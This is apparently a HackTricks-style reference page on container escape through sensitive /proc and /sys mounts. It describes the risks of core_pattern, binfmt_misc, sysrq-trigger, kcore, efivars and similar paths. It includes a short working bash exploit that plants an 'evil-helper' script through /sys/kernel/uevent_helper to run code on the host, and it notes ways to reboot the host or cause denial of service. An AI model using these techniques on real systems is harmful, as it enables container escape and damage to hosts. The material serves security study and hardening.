Sensitive Mounts
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
The exposure of /proc and /sys without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting -v /proc:/host/proc can bypass AppArmor protection due to its path-based nature, leaving /host/proc unprotected.
You can find further details of each potential vuln in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
/proc/sysThis directory permits access to modify kernel variables, usually via sysctl(2), and contains several subdirectories of concern:
/proc/sys/kernel/core_patternDescribed in core(5).
Allows defining a program to execute on core-file generation with the first 128 bytes as arguments. This can lead to code execution if the file begins with a pipe |.
Testing and Exploitation Example:
/proc/sys/kernel/modprobeDetailed in proc(5).
Contains the path to the kernel module loader, invoked for loading kernel modules.
Checking Access Example:
/proc/sys/vm/panic_on_oomReferenced in proc(5).
A global flag that controls whether the kernel panics or invokes the OOM killer when an OOM condition occurs.
/proc/sys/fsAs per proc(5), contains options and information about the file system.
Write access can enable various denial-of-service attacks against the host.
/proc/sys/fs/binfmt_miscAllows registering interpreters for non-native binary formats based on their magic number.
Can lead to privilege escalation or root shell access if /proc/sys/fs/binfmt_misc/register is writable.
Relevant exploit and explanation:
In-depth tutorial: Video link
/proc/proc/config.gzMay reveal the kernel configuration if CONFIG_IKCONFIG_PROC is enabled.
Useful for attackers to identify vulnerabilities in the running kernel.
/proc/sysrq-triggerAllows invoking Sysrq commands, potentially causing immediate system reboots or other critical actions.
Rebooting Host Example:
/proc/kmsgExposes kernel ring buffer messages.
Can aid in kernel exploits, address leaks, and provide sensitive system information.
/proc/kallsymsLists kernel exported symbols and their addresses.
Essential for kernel exploit development, especially for overcoming KASLR.
Address information is restricted with kptr_restrict set to 1 or 2.
Details in proc(5).
/proc/[pid]/memInterfaces with the kernel memory device /dev/mem.
Historically vulnerable to privilege escalation attacks.
More on proc(5).
/proc/kcoreRepresents the system's physical memory in ELF core format.
Reading can leak host system and other containers' memory contents.
Large file size can lead to reading issues or software crashes.
Detailed usage in Dumping /proc/kcore in 2019.
/proc/kmemAlternate interface for /dev/kmem, representing kernel virtual memory.
Allows reading and writing, hence direct modification of kernel memory.
/proc/memAlternate interface for /dev/mem, representing physical memory.
Allows reading and writing, modification of all memory requires resolving virtual to physical addresses.
/proc/sched_debugReturns process scheduling information, bypassing PID namespace protections.
Exposes process names, IDs, and cgroup identifiers.
/proc/[pid]/mountinfoProvides information about mount points in the process's mount namespace.
Exposes the location of the container rootfs or image.
/sys Vulnerabilities/sys/kernel/uevent_helperUsed for handling kernel device uevents.
Writing to /sys/kernel/uevent_helper can execute arbitrary scripts upon uevent triggers.
Example for Exploitation: %%%bash
Creates a payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
Finds host path from OverlayFS mount for container
host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)
Sets uevent_helper to malicious helper
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
Triggers a uevent
echo change > /sys/class/mem/null/uevent
Reads the output
cat /output %%%
/sys/class/thermalControls temperature settings, potentially causing DoS attacks or physical damage.
/sys/kernel/vmcoreinfoLeaks kernel addresses, potentially compromising KASLR.
/sys/kernel/securityHouses securityfs interface, allowing configuration of Linux Security Modules like AppArmor.
Access might enable a container to disable its MAC system.
/sys/firmware/efi/vars and /sys/firmware/efi/efivarsExposes interfaces for interacting with EFI variables in NVRAM.
Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines.
/sys/kernel/debugdebugfs offers a "no rules" debugging interface to the kernel.
History of security issues due to its unrestricted nature.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
